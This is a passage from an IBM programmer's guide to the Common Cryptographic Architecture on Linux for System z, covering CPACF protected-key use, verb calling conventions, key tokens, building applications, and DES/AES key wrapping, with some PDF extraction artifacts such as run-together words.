CSU_HCPUACLR=1 +Setting this variable to any other value (except for the case where the variable has not been set, as noted +above) results in disabling the use of the CPACF for clear key operations and hashing algorithms. The +default is '1', meaning that the function is enabled. +Affected verbs: +v MDC Generate (CSNBMDG) +v One-Way Hash (CSNBOWH) +v SymmetricAlgorithm Decipher (CSNBSAD) (clear keyAES) +v SymmetricAlgorithm Encipher (CSNBSAE) (clear keyAES) +8 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +CSU_HCPUAPRT +Use of the CPACF for protected key (translated secure key) operations is allowed if this variable is set to +'1' in a profile setup file or with this command: +export CSU_HCPUAPRT=1 +Setting this variable to any other value (except for the case where the variable has not been set, as noted +above) results in disabling the use of the CPACF for protected key (translated secure key) operations. The +default is '0', meaning that the function is disabled. +Affected verbs: +v Decipher (CSNBDEC) +v Encipher (CSNBENC) +v MAC Generate (CSNBMGN) +v MAC Verify (CSNBMVR) +v SymmetricAlgorithm Decipher (CSNBSAD) (clear keyAES) +v SymmetricAlgorithm Encipher (CSNBSAE) (clear keyAES) +Access control points that affect CPACF protected key operations +There are two access points that enable the protected key feature: +Symmetric Key Encipher/Decipher - Encrypted DES keys +This is bit X'0295', and is set ON by default. +ThisACP enables translating DES keys for use with the CPACF. Without this bit set ON, the call to the +CEX3C to rewrap the key under the CPACF wrapping key will fail with a return code 8 and reason code +90, which will in turn imply disabling the use of this function by the host user. This error will not be +returned to the user, instead the operation will be sent to the CEX3C. Because the default value of the +bit is ON, it is assumed that the user will know that it is set OFF on purpose.Areturn code 8 and +reason code 90 will cause no further requests to go to the CEX3C verb that translates keys, in an effort +to preserve normal path performance. +Symmetric Key Encipher/Decipher - EncryptedAES keys +This is bit X'0296', and is set ON by default. +ThisACP enables translatingAES keys for use with the CPACF. Without this bit set ON, the call to the +CEX3C to rewrap the key under the CPACF wrapping key will fail with a return code 8 and reason code +90, which will in turn imply disabling the use of this function by the host user. This error will not be +returned to the user, instead the operation will be sent to the CEX3C. Because the default value of the +bit is ON, it is assumed that the user will know that it is set OFF on purpose.Areturn code 8 and +reason code 90 will cause no further requests to go to the CEX3C verb that translates keys, in an effort +to preserve normal path performance. +CPACF operation (protected key) +These are details for Central ProcessorAssist for Cryptographic Functions (CPACF) usage by the host +library. +Note that at system power-on, the CPACF generates a new Key Encryption Key (KEK, kek-t) for wrapping +translated keys. +Figure2 on page 10 illustrates the CPACF layer as it relates to the security accessAPI and cryptographic +engine. The CPACF exploitation layer examines commands received by the security server to see if they +can be redirected to the CPACF. If so, this layer makes preparations (including translating secure keys to +protected keys), and then call the CPACF directly. If all preparations and the CPACF operations are +Chapter1.IntroductiontoprogrammingfortheIBMCommonCryptographicArchitecture 9 + +successful, the results are returned as a normal return through the security server. For any errors, the +command is redirected back through the security server to the normal path, using the allocated CEX3C for +the thread making the call. +| +| +| Figure2.CPACF +| +| Clear key or No key: For operations that do not use keys (such as hash algorithms) or operations that +| use keys that are not encrypted under the card master key, (called clear keys), no translation is necessary +| and the CPACF is used immediately. +Protected key: The device driver and the other layers are used for protected key support, for translating +keys. This relationship is similar to the 'directory server' relationship: a translation layer invisible to the +customer.After translation the 'translated-key' is stored in an invisible runtime cache so that the next use +of the key can avoid the translation step. For protected key usage, a CEX3C feature must be available +and allocated for use by the thread. +Important note about CPACF service actions and running applications +This note applies to processes using protected keys. +The CPACF is an independent hardware unit, like the CEX3C itself, and can be independently configured +available or unavailable while an S/390® Linux instance is running by service technicians performing +service actions. If the CPACF is cycled it will generate a new wrapping key for translated keys, invalidating +all of the keys in the CCAlibrary key translation cache. Therefore, it is never advisable to attempt such a +service action while there are system instances with applications running that use the CPACF. +10 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +If such an action is undertaken, applications should be stopped and restarted so that the libcsulcca.so is +unloaded from memory and reloaded. This will cause the key cache to be cycled.Amore complete +measure would be to reboot system images. If these precautions are disregarded and a CPACF service +action is undertaken as described, application crashes may ensue with a SIGSEGV error. This could occur +due to translated keys wrapped under outdated CPACF wrapping keys being used. +Anormal system-wide power cycle will cause the CPACF to generate a new wrapping key by design, +however, this action also of course cycles all of the hosted system LPARs and VM system images so there +is no problem; translated keys are not cached in permanent storage. +Using keys with CPACF, protected key +1. An eligible CCAverb call (see lists in “Access control points that affect CPACF protected key +operations” on page 9) specifying a key token or key identifier for a key token that is a normal internal +CCAkey token, called key-e here, comes into the CCAlibrary. +2. The CCAlibrary verifies that a CEX3C is available for key translation. If not, then the standard +‘no-available-device’error will be returned. +3. The CCAlibrary tries to find an already translated version (key-t) that matches the key-e passed into +the CCAlibrary. +v The user application (CCAlibrary in this case) must cache translated key-t objects in RAM, using +the key-e tokens as references. +4. If a key-t is not found for the key-e used: +The CCAlibrary translates the key-e to a key-t for use with the CPACF using CCAsecure services, +then caches the key pair. +5. At this point, either a fresh key-t has been obtained, or a key-t was found in RAM cache for the +operation. +6. The CCAlibrary directs the operation to the CPACF using the key-t. +The panel.exe -m command displays all the supported CPACF functions. This is especially useful on a +z/VM system, to make sure that the protected key functions are available. For details, see “The panel.exe +utility” on page 553. +| Using keys with CPACF, clear key or no key +1. An eligible CCAverb call (see lists in “Access control points that affect CPACF protected key +operations” on page 9) comes into the CCAlibrary. +2. No CEX3C is necessary, so no check for availability or Cryptographic ResourceAllocate (CSUACRA) +call will be implied. +3. The CCAlibrary prepares an appropriate CPACF clear key (key-c) structure using the clear key passed +to the CCAverb (key-v). +4. The CCAlibrary directs the operation to the CPACF using the key-c. +CCA library CPACF preparation at startup +When the CCAlibrary first starts up, it must prepare for use of the Central ProcessorAssist for +Cryptographic Functions (CPACF) by taking the following initialization steps: +1. Check configuration options to see if either is set to 'on', allowing some use of the CPACF. +If neither is on, skip the rest of initialization. +2. Check for existence and configuration of the CPACF. +Interaction between the 'default card' and use of Protected Key CPACF +While the CPACF can be used to encrypt and decrypt data in the absence of a CEX3C, for protected key +operations a CEX3C is still necessary and it must be the allocated or default adapter for the thread doing +the processing. This is necessary because the users' key tokens are translated with a service only +available on the CEX3C for use with the CPACF. Note also that for mixed CEX2C and CEX3C +Chapter1.IntroductiontoprogrammingfortheIBMCommonCryptographicArchitecture 11 + +configurations, the allocated adapter for the thread must be a CEX3C because the service that translates +the keys is not available on the CEX2C, for any CCAfirmware version. +Security API programming fundamentals +You obtain CCAcryptographic services from the coprocessor through procedure calls to the CCAsecurity +application programming interface (API). Most of the services provided are considered an implementation +of the IBM Common CryptographicArchitecture (CCA). Most of the extensions that differ from other IBM +CCAimplementations are in the area of the access-control services. If your application program is used +with other CCAproducts, compare the product literature for differences. +Your application program requests a service through the securityAPI by using a procedure call for a verb. +The term verb implies an action that an application program can initiate; other systems and publications +might use the term callable service instead. The procedure call for a verb uses the standard syntax of a +programming language, including the entry-point name of the verb, the parameters of the verb, and the +variables for the parameters. Each verb has an entry-point name and a fixed-length parameter list. +The securityAPI is designed for use with high-level languages, such as C, COBOL, or RPG and for +low-level languages, such as assembler. It is also designed to enable you to use the same verb entry-point +names and variables in the various supported environments. Therefore, application code you write for use +in one environment generally can be ported to additional environments with minimal change. +Verbs, variables, and parameters +This section explains how each verb is described in Part2, “CCAverbs,” on page 55, and provides an +explanation of the characteristics of the securityAPI. +Each verb has an entry-point name and a fixed-length parameter list. Part2, “CCAverbs,” on page 55 +describes each verb, and includes the following information for each verb: +v Pseudonym +v Entry-point name +v Description +v Format +v Parameters +v Restrictions +v Required commands +v Usage notes +v Related information +| v JNI version +Pseudonym +Also known as a general-language name or verb name, this name describes the function that the +verb performs, such as Key Generate. +Entry-point name +Also known as a computer-language name, this name is used in your program to call the verb. Each +verb's 7 or 8 character, entry-point name begins with one of the following prefixes: +Prefix Type of verb +CSNB Generally, theAES and DES verbs +| CSND Public key cryptography verbs, including RSAand Elliptic Curve +CSUA Cryptographic-node and hardware-control verbs +12 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +The last three or four letters in the entry-point name after the prefix identify the specific verb in a +group and are often the first letters of the principal words in the verb pseudonym. +| When verbs are described throughout this publication, they are sometimes referred to by the +| pseudonym, and at other times by the pseudonym followed by the verb entry point name in +| parenthesis.An example of this is: Key Generate (CSNBKGN). +| The verb prefixes used here are different from those used by IBM's Integrated Cryptographic Service +| Facility (ICSF). +Description +The verb is described in general terms. Be sure to read the parameter descriptions because these +add additional detail. +Format +The format section for each verb lists the entry-point name on the first line. This is followed by the list +of parameters for the verb. You must code all the parameters, and they must be in the order listed. +entry-point name( +return_code, +reason_code, +exit_data_length, +exit_data, +parameter_5, +parameter_6, +. +. +. +parameter_n ) +Parameters +All information exchanged between your application program and a verb is through the variables +identified by the parameters in the procedure call. These parameters are pointers to the variables +contained in application program storage that contain information to be exchanged with the verb. +Each verb has a fixed-length parameter list and though all parameters are not always used by the +verb, they must be included in the call. +The first four parameters are the same for all of the verbs. For a description of these parameters, see +“Parameters common to all verbs” on page 14 and the individual verbs. The remaining parameters +are unique for each verb. For descriptions of these parameters, see the definitions with the individual +verbs. +In the description for each parameter, data flow direction and data type are indicated, as follows. +Direction: Direction Type: Data type +Direction: The parameter descriptions use the following terms to identify the flow of information: +Input The application program sends the variable to the verb (to the called routine). +Output The verb returns the variable to the application program. +Input/Output The application program sends the variable to the verb or the verb returns the +variable to the application program, or both. +Type: Data identified by a verb parameter can be a single value or a one-dimensional array. If a +parameter identifies an array, each data element of the array is of the same data type. If the number +of elements in the array is variable, a preceding parameter identifies a variable that contains the +actual number of elements in the associated array. Unless otherwise stated, a variable is a single +value, not an array. +For each verb, the parameter descriptions use the following terms to describe the type of variable: +Integer +A4-byte (32-bit), signed, two's-complement binary number. +Chapter1.IntroductiontoprogrammingfortheIBMCommonCryptographicArchitecture 13 + +String Aseries of bytes where the sequence of the bytes must be maintained. Each byte can take +on any bit configuration. The string consists only of the data bytes. No string terminators, +field-length values, or typecasting parameters are included. Individual verbs can restrict the +byte values within the string to characters or numerics. +Character data must be encoded in the native character set of the computer where the data +is used. Exceptions to this rule are noted where necessary. +Array An array of values, which can be integers or strings. Only one-dimensional arrays are +permitted. For information about the parameters that use arrays, see “The rule_array and +other keyword parameters” on page 15. +Restrictions +Any restrictions are noted. +Required commands +Any access control points required to use the verb are described here. +Usage notes +Usage notes about this verb are listed. +Related information +Any related information is noted. +JNI version +If the verb has a Java Native Interface version, it is described. +Commonly encountered parameters +Some parameters are common to all verbs, other parameters are used with many of the verbs. This +section describes several groups of these parameters: +v “Parameters common to all verbs” +v “The rule_array and other keyword parameters” on page 15 +v “Key tokens, key labels, and key identifiers” on page 15 +Parameters common to all verbs +The first four parameters (return_code, reason_code, exit_data_length, and exit_data) are the same for all +verbs.Aparameter is an address pointer to the associated variable in application program storage. +return_code +The return code specifies the general result of the verb.AppendixA, “Return codes and reason codes” +lists the return codes. +reason_code +The reason code specifies the result of the verb that is returned to the application program. Each +return code has different reason codes assigned to it that indicate specific processing problems. +AppendixA, “Return codes and reason codes” lists the reason codes. +exit_data_length +Apointer to an integer value containing the length of the string (in bytes) that is returned by the +exit_data value. This parameter should point to a value of zero, to ensure compatibility with any future +extension or other operating environment. +exit_data +The data that is passed to an installation exit. Exits are not supported and no exit data is allowed in +this parameter. +Restriction: The exit_data_length and exit_data variables must be declared in the parameter list. The +exit_data_length parameter should be set to 0. +14 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Return code and reason code overview: The return_code variable provides a general indication of the +results of verb processing and is the value your application program should generally use in determining +the course of further processing. For a list of return codes and their meanings, see “Return codes” on +page 407. The reason_code variable provides more specific information about the outcome of verb +processing. Reason code values generally differ between CCAproduct implementations. Therefore, the +reason code values should generally be returned to individuals who can understand the implications in the +context of your application on a specific platform. +SeeAppendixA, “Return codes and reason codes” for a detailed discussion of return codes and a +complete list of all return and reason codes. +The rule_array and other keyword parameters +rule_array parameters and some other parameters use keywords to transfer information. Generally, a +rule_array consists of a variable number of data elements that contain keywords that direct specific details +of the verb process.Almost all keywords, in a rule_array or otherwise, are eight bytes in length, and +should be uppercase, left-aligned, and padded on the right with space characters. Not all implementations +fold lowercase characters to uppercase so you should always code the keywords in uppercase. +The number of keywords in a rule_array is specified by a rule_array_count variable, an integer that defines +the number of 8-byte elements in the array. +In some cases, a rule_array is used to convey information other than keywords between your application +and the server. This is, however, an exception. For a list of key types that are passed in the rule_array +keyword, see Table2 on page 29. +Key tokens, key labels, and key identifiers +Essentially all cryptographic operations employ one or more keys. In CCA, keys are retained within a +structure called a key token.Averb parameter can point to a variable that contains a key token. Generally +you do not need to be concerned with the details of a key token and can deal with it as an entity. +Key tokens are described as either internal, operational, or external, as follows: +Internal Akey token that contains an encrypted key for local use. The cryptographic engine +decrypts an internal key to use the key in a local operation. When a key is entered into the +system, it is always encrypted if it appears outside the protected environment of the +cryptographic engine. The engine has a special key-encrypting key designated a master +key. This key is held within the engine to wrap and unwrap locally used keys. +Operational An internal key token that is complete and ready for use and contains a key that is +encrypted under a master key. During entry of a key, the internal key-token can have a +flag set indicating the key information is incomplete. +External Akey token that contains a key that is either in the clear or is encrypted by some +key-encrypting key other than the master key. Generally, when a key is to be transported +from place to place or is to be held for a significant period of time, the key must be +encrypted with a transport key.Akey wrapped by a (transport) key-encrypting key is +designated as being external. +| RSAand ECC public-keys are not encrypted values and, when not accompanied by +| private-key information, are retained in an external key-token. +Internal key tokens can be stored in a file maintained by the directory server. These key tokens are +referenced by use of a key label.Akey label is an alphanumeric string you place in a variable and +reference with a verb parameter. +Verb descriptions specify how you can provide a key using these terms: +Term Description +Chapter1.IntroductiontoprogrammingfortheIBMCommonCryptographicArchitecture 15 + +Key token The variable must contain a proper key-token structure. +Key label The variable must contain a key-label string used to locate a key record in key storage. +Key identifier The variable must contain either a key token or a key label. The first byte in the variable +indicates whether the variable contains a key token or a key label. When the first byte is in +the range X'20' - X'FE', the variable is processed as a key label. There are additional +restrictions on the value of a key label. The first byte in all key-token structures is in the +range of X'01' - X'1F'. The value X'00' indicates a DES null key-token. The value X'FF' as +the first byte of a key-related variable passed to theAPI raises an error condition. +How to compile and link CCA application programs +The Support Program includes the C language source code and the make file for a sample program. The +file and its default distribution location is: +/opt/IBM/CEX3C/samples +Compile application programs that use CCA, and link the compiled programs to the CCAlibraries. The +libraries and their default distribution locations are: +/usr/lib64/libcsulcca.so.* +/usr/lib64/libcsulccamk.so.* +Note: /usr/lib64/libcsulccamk.so contains the Master Key Process (CSNBMKP) verb.Any use of the +libcsulccamk.so library is restricted because the library is installed so that only the 'root' user (user +id of 0) and members of the group 'cca_admin' have read access. The cca_admin group is added +by the CCARPM install procedure. This is done to limit the ability of an untrusted user to copy the +library with the purpose of reverse-engineering the master-key access methods inside it. +Furthermore, use of some specific access methods through the Master Key Process (CSNBMKP) +verb are restricted to corresponding Linux group membership of the user trying to make that +access. Table161 on page 546 contains a list of the groups and their functions. +Users without the required group membership are denied use. For more information, see Master +key load (Step 7 on page 544). +Building Java applications to use with the CCA JNI +The CCASupport Program includes a CCAJava Native Interface (JNI). To illustrate how to use the CCA +JNI to call CCAverbs, a sample module named mac.java is provided. The mac.java sample program calls +the same CCAverbs as the sample C language program mac.c. See “Sample program in Java” on page +532. +The default distribution location of the sample code is: +Operating system Default distribution location +Novell SUSE Linux /opt/IBM/CEX3C/samples +Red Hat Linux /opt/IBM/CEX3C/samples +These versions of Java are supported for JNI: +v Java 1.6.0 for Red Hat Enterprise Linux +v Java 1.4.2 for SUSE Linux Enterprise Server 10 and 11 (SLES 10 and 11) from Novell +These Java versions are the tested versions, and they were installed from the distribution CD or other +authorized source for that distribution, and they were not customized in any way. +So that the CCAcan access Java, do one of the following: +16 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +1. Add the path to the java/javac executable to the user's PATH environment variable, so that they can +call the command without preconditions. +2. Create soft-links from the java/javac executables from wherever they are located to a directory that is +in the user's PATH environment variable by default, such as /usr/bin/. +The Java entry points of CCAverbs are very similar to the C entry points except that a letter 'J' is +appended to the entry point name. For example, CSNBKGN is the C entry point for the Key Generate +verb, and CSNBKGNJ is the Java entry point for this verb. Where each verb is described in detail in +Part2, “CCAverbs,” on page 55, a section for the JNI interface is included. +Data types used in the JNI +These two data types are defined and used in the JNI: +hikmNativeInteger 64-bit native signed integer (type long), matching the C interface +Byte * General pointer type to unsigned byte +Afile named hikmNativeInteger.html provides information about this class, and is located in the same +directory as the mac.java file. +Building the Java Byte code +Issue the following command from the directory that contains the source code file .java to +compile the program: +javac -classpath /opt/IBM/CEX3C/cnm/HIKM.zip .java +Notes: +1. The classpath option points to the HIKM.zip file because the hikmNativeInteger class and JNI verb +front end classes are in this file. +2. The path shown for the HIKM.zip file is the default RPM installation location of that file. +For applications that also use the Master Key Process (CSNBMKP) verb: For security, the JNI +interface for the Master Key Process (CSNBMKP) verb is also in the restricted access library +libcsulccamk.so, and the Java class front end is implemented in a separate compressed file. Therefore, to +compile a Java Byte code file named .java, issue this command: +javac -classpath /opt/IBM/CEX3C/cnm/HIKM.zip:/opt/IBM/CEX3C/cnm/HIKMMK.zip .java +Notes: +1. The classpath option points to the HIKM.zip file because the hikmNativeInteger class and JNI verb +front end classes are in this file. +2. The classpath option also points to the HIKMMK.zip file, where the Master Key Process (CSNBMKP) +verb Java class front end for the JNI implementation is found. +3. The path shown for the HIKM.zip and HIKMMK.zip files is the default RPM installation location of that +file. +Running the Java Byte code +Issue the following command from the directory that contains the Java Byte code file .class to +run the program: +java -classpath /opt/IBM/CEX3C/cnm/HIKM.zip:..class +Notes: +1. See “Building the Java Byte code” for notes on the HIKM.zip classpath. +2. Notice that '.' (period) is added to the class path so that Java can find .class in the current +directory. +For applications that also use the Master Key Process (CSNBMKP) verb: You must also add the +extra classpath option noted above for building to the run step: +Chapter1.IntroductiontoprogrammingfortheIBMCommonCryptographicArchitecture 17 + +java -classpath /opt/IBM/CEX3C/cnm/HIKM.zip:/opt/IBM/CEX3C/cnm/HIKMMK.zip:..class +Notes: +1. See “Building the Java Byte code” on page 17 for notes on the HIKM.zip classpath. +2. Notice that '.' (period) is added to the class path so that Java can find .class in the current +directory. +18 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +| +Chapter 2. Using AES, DES, and HMAC cryptography and +verbs +The CEX3C protects data from unauthorized disclosure or modification. This coprocessor protects data +stored within a system, stored in a file off a system on magnetic tape, and sent between systems. The +coprocessor also authenticates the identity of customers in the financial industry and authenticates +messages from originator to receiver. The coprocessor uses cryptography to perform these functions. +The CCAAPI for the coprocessor provides access to cryptographic functions through verbs.Averb is a +routine that receives control using a function call from an application program. Each verb performs one or +more cryptographic functions, including: +v Generating and managing cryptographic keys +v Enciphering and deciphering data with encrypted keys using either the U.S. National Institute of +Standards and Technology (NIST) Data Encryption Standard (DES) orAdvanced Encryption Standard +(AES) +v Re-enciphering text from encryption under one key to encryption under another key +v Encoding and decoding data with clear keys +v Generating random numbers +v Ensuring data integrity and verifying message authentication +v Generating, verifying, and translating personal identification numbers (PINs) that identify a customer on +a financial system +| This chapter provides an overview of theAES, DES, and HMAC cryptographic functions provided by CCA, +| explains the functions of the cryptographic keys, and introduces the topic of building key tokens. +Functions of the AES, DES and HMAC cryptographic keys +| +| The CCAAPI provides functions to create, import, and exportAES, DES and HMAC keys. This section +| gives an overview of these cryptographic keys. +Key separation +The cryptographic coprocessor controls the use of keys by separating them into unique types, allowing you +to use a specific type of key only for its intended purpose. For example, a key used to protect data cannot +be used to protect a key. +ACCAsystem has only one DES orAES master key. However, to provide for key separation, the +cryptographic coprocessor automatically encrypts each type of key under a unique variation of the master +key. Each variation of the master key encrypts a different type of key.Although you enter only one master +key, you have a unique master key to encrypt all other keys of a certain type. +Master key variant +Whenever the master key is used to encipher a key, the cryptographic coprocessor produces a variation of +the master key according to the type of key that the master key will encipher. These variations are called +master key variants. The cryptographic coprocessor creates a master key variant by XORing a fixed +pattern, called a control vector, onto the master key.Aunique control vector is associated with each type +of key. For example, all the different types of data-encrypting, PIN, MAC, and transport keys each use a +unique control vector which is XORed with the master key in order to produce the variant. The different +key types are described in “Types of keys” on page 25. +Each master key variant protects a different type of key. It is similar to having a unique master key protect +all the keys of a certain type. +©CopyrightIBMCorp.2007,2011 19 + +The master key, in the form of master key variants, protects keys operating on the system.Akey can be +used in a cryptographic function only when it is enciphered under a master key. When systems want to +share keys, transport keys are used to protect keys sent outside of systems. When a key is enciphered +under a transport key, the key cannot be used in a cryptographic function. It must first be brought on to a +system and enciphered under the system's master key, or exported to another system where it will then be +enciphered under that system's master key. +Transport key variant +Like the master key, the coprocessor creates variations of a transport key to encrypt a key according to its +type. This allows for key separation when a key is transported off the system.Atransport key variant, also +called key-encrypting key variant, is created the same way a master key variant is created. The transport +key's clear value is XORed with a control vector associated with the key type of the key it protects. +Note: To exchange keys with systems that do not recognize transport key variants, the coprocessor +allows you to encrypt selected keys under a transport key itself, not under the transport key variant. +For more information, see NOCV Importers and Exporters on page 26. +Key forms +Akey that is protected under the master key is in operational form, which means the coprocessor can use +it in cryptographic functions on the system. +When you store a key with a file or send it to another system, the key is enciphered under a transport key +rather than the master key. The transport key is a key shared by your system and another system for the +purpose of securely exchanging other keys. When CCAenciphers a key under a transport key, the key is +not in operational form and cannot be used to perform cryptographic functions. +When a key is enciphered under a transport key, the sending system considers the key in exportable form. +The receiving system considers the key in importable form. When a key is re-enciphered from under a +transport key to under a system's master key, it is in operational form again. +Enciphered keys appear in three forms. The form you need depends on how and when you use a key. +v Operational key form is used at the local system. Many verbs can use an operational key form. +The Key Generate, Key Import, Data Key Import, Clear Key Import, and Multiple Clear Key Import verbs +can create an operational key form. +v Exportable key form is transported to another cryptographic system. It can be passed only to another +system. The CCAverbs cannot use it for cryptographic functions. The Key Generate, Data Key Export, +and Key Export verbs produce the exportable key form. +v Importable key form can be transformed into operational form on the local system. The Key Import verb +(CSNBKIM) and the Data Key Import verb (CSNBDKM) can use an importable key form. Only the Key +Generate verb (CSNBKGN) can create an importable key form. +For more information about the key types, see “Functions of theAES, DES and HMAC cryptographic keys” +on page 19. SeeAppendixC, “Key forms and types used in the Key Generate verb,” on page 459 for +more information about key form. +Symmetric key (DES, AES) flow +The conversion from one key to another key is considered to be a one-way flow.An operational key form +cannot be turned back into an importable key form.An exportable key form cannot be turned back into an +operational or importable key form. The flow of CCAkey forms can be in only one direction: +IMPORTABLE —to→ OPERATIONAL —to→ EXPORTABLE +20 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key token +| AnAES or DES key token is a 64-byte field composed of a key value and control information.An HMAC +| key token is a variable-length token composed of a key value and control information. The control +| information is assigned to the key when the coprocessor creates the key. The key token can be either an +| internal key token, an external key token, or a null key token. Through the use of key tokens, CCAcan do +| the following: +| v Support continuous operation across a master key change +| v Control use of keys in cryptographic services +If the first byte of the key identifier is X'01', the key identifier is interpreted as an internal key token.An +internal key token is a token that can be used only on the CCAsystem that created it or another CCA +system with the same host master key. It contains a key that is encrypted under the master key. +An application obtains an internal key token by using one of the verbs such as those listed below. The +verbs are described in detail in Chapter5, “ManagingAES and DES cryptographic keys.” +| v AES Key Record Read +v Clear Key Import +v Data Key Import +| v DES Key Record Read +v Key Generate +| v Key Generate2 +v Key Import +| v Key Part Import +| v Key Part Import2 +v Key Token Build +| v Key Token Build2 +v Multiple Clear Key Import +The master key could be dynamically changed between the time that you invoke a verb, such as the Key +Import verb, to obtain a key token, and the time that you pass the key token to the Encipher verb. When a +change to the master key occurs, the coprocessor will still successfully use the key, because it stores a +copy of the old master key as well as the new one. +| Attention: If an internal key token held in user storage is not used while the master key is changed +| twice, the internal key token is no longer usable.Areturn code of 0 with a reason code of 10001 notifies +| you that the master key used to decrypt the key used in your operation was an old master key, as a +| reminder that you should use one of the Key Token Change verbs to re-encipher your key under the +| current or new master key (as desired, see verbs for description). +For debugging information, seeAppendixB, “Key token formats” for the format of an internal key token. +If the first byte of the key identifier is X'02', the key identifier is interpreted as an external key token. By +using the external key token, you can exchange keys between systems. It contains a key that is encrypted +under a key-encrypting key. +An external key token contains an encrypted key and control information to allow compatible cryptographic +systems to: +v Have a standard method of exchanging keys +v Control the use of keys through the control vector +v Merge the key with other information needed to use the key +Chapter2.UsingAES,DES,andHMACcryptographyandverbs 21 + +An application obtains the external key token by using one of the verbs such as those listed below. They +are described in detail in Chapter5, “ManagingAES and DES cryptographic keys.” +v Key Generate +v Key Export +v Data Key Export +For debugging information, seeAppendixB, “Key token formats” for the format of an external key token. +If the first byte of the key identifier is X'00', the key identifier is interpreted as a null key token. Use the +null key token to import a key from a system that cannot produce external key tokens. That is, if you have +an 8 or 16-byte key that has been encrypted under an importer key, but is not imbedded within a token, +place the encrypted key in a null key token and then invoke the Key Import verb to get the key in +operational form. +For debugging information, seeAppendixB, “Key token formats” for the format of a null key token. +Key wrapping +| +| This section explains how symmetric keys are wrapped with master and key-encrypting keys. For DES and +| AES keys, two methods are detailed. These methods use the 64-byte token. HMAC keys use a variable +| length token with associated data and the payload wrapping method. +| AES key wrapping +| The key value inAES tokens are wrapped using theAES algorithm and cipher block chaining (CBC) mode +| of encryption. The key value is left justified in a 32-byte block, padded on the right with zero, and +| encrypted. +| The enhanced wrapping of anAES key (*K) using anAES *MK is defined as: +| e*MK(*K) = ecbcMK(*K) +| DES key wrapping +| The key value in a DES key token are wrapped using one of two possible methods: +| Original method +| The key value in DES tokens are encrypted using triple-DES encryption, and key parts are encrypted +| separately. See “ECB wrapping of DES keys (Original method).” +| Enhanced method +| The key value for keys is bundled with other token data and encrypted using triple-DES encryption and +| cipher block chaining mode. The enhanced method applies only to DES key tokens. The enhanced +| method of symmetric key wrapping is designed to beANSI X9.24 compliant. This method was +| introduced with CCA4.1.0. See “Enhanced CBC wrapping of DES keys (Enhanced method)” on page +| 23. +| ECB wrapping of DES keys (Original method) +| The wrapping of a double-length key (*K) using a double-length key-encrypting key (*KEK) is defined as +| follows: +| e*KEK(KL) || e*KEK(KR) = eKEKL(dKEKR(eKEKL(KL))) || eKEKL(dKEKR(eKEKL(KR))) +| Where: +|| KL Is the left 64 bits of *K +|| KR Is the right 64 bits of *K +|| KEKL Is the left 64 bits of *KEK +|| KEKR Is the right 64 bits of *KEK +22 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +|| | | Means concatenation +| Enhanced CBC wrapping of DES keys (Enhanced method) +| The enhanced CBC wrapping method uses triple-DES encryption, an internal chaining of the key value, +| and CBC mode. This method was introduced with CCA4.1.0. +| The enhanced wrapping of a double-length key (*K) using a double-length key-encrypting key (*KEK) is +| defined as: +| e*KEK(*KL) = ecbcKEKL(dcbcKEKR(ecbcKEKL(KLPRIME || KR))) +| KLPRIME = KL XOR SHA1(KR) +| Where: +|| KL Is the left 64 bits of *K +|| KR Is the right 64 bits of *K +|| KLPRIME Is the 64-bit modified value of KL +|| KEKL Is the left 64 bits of *KEK +|| KEKR Is the right 64 bits of *KEK +|| SHA1(X) Is the 160-bit SHA-1 hash of X +|| | | Means concatenation +|| XOR Means bitwise exclusive OR +|| ecbc Means encryption using cipher block chaining mode +|| dcbc Means decryption using cipher block chaining mode +| Wrapping key derivation for enhanced wrapping of DES keys: The wrapping key is exactly the same +| key that is used by the legacy wrapping method (the only method used by CCA4.0.0), with one exception. +| Instead of using the base key itself (master key or key-encrypting key), a key that is derived from that +| base key is used. The derived key will have the control vector applied to it in the standard CCAmanner, +| and then use the resulting key to wrap the new-format target key token. +| The reason for using a derived key is to ensure that no attacks against this wrapping scheme are possible +| using the existing CCAfunctions. For example, it was observed that an attack was possible by copying the +| wrapped key into an ECB CCAkey token, if the wrapping key was used instead of a derivative of that key. +| The key will be derived using a method defined in the U.S. National Institute of Standards and Technology +| (NIST) standard SP 800-108, Recommendation for Key Derivation Using Pseudorandom Functions +| (October, 2009). Derivation will use the method KDF in Counter Mode using pseudorandom function (PRF) +| HMAC-SHA256. This method provides sufficient strength for deriving keys for any algorithm used. +| The HMAC algorithm is defined as: +| HMAC(K, text) = H((K0 XOR opad ) || H((K0 XOR ipad) || text)) +| Where: +|| H Is an approved hash function. +|| K Is a secret key shared between the originator and the intended receivers. +|| K0 The key K after any necessary preprocessing to form a key of the proper length. +|| ipad Is the constant X'36' repeated to form a string the same length as K0 +|| opad Is the constant X'5C' repeated to form a string the same length as K0 +|| text Is the text to be hashed. +Chapter2.UsingAES,DES,andHMACcryptographyandverbs 23 + +|| || Means concatenation +|| XOR Means bitwise exclusive OR +| If the key K is equal in length to the input block size of the hash function (512 bits for SHA-256), K0 is set +| to the value of K. Otherwise, K0 is formed from K by hashing or padding. +| The Key Derivation Function (KDF) specification calls for inputs optionally including two byte strings, Label +| and Context. The Context will not be used. The Label will contain information on the usage of this key, to +| distinguish it from other derivations that CCAmay use in the future for different purposes. Because the +| security of the derivation process is rooted in the security of the derivation key and in the HMAC and Key +| Derivation Functions (KDF) themselves, it is not necessary for this label string to be of any particular +| minimum size. The separation indicator byte of X'00' specified in the NIST document will follow the label. +| The label value will be defined so that it is unique to derivation for this key wrapping process. This means +| that any future designs that use the same KDF must use a different value for the label. The label will be +| the 16 byte value consisting of the followingASCII characters: +| ENHANCEDWRAP2010 (X’454E4841 4E434544 57524150 32303130’) +| The parameters for the counter mode KDF defined in NIST standard SP 800-108 are: +| Fixed values: +|| h Length of output of PRF, 256 bits +|| r Length of the counter, in bits, 32. The counter will be an unsigned 4-byte value. +| Inputs: +| v KI (input key) - The key we are deriving from. +| v Label - The value shown above (ASCII ENHANCEDWRAP2010). +| v Separator 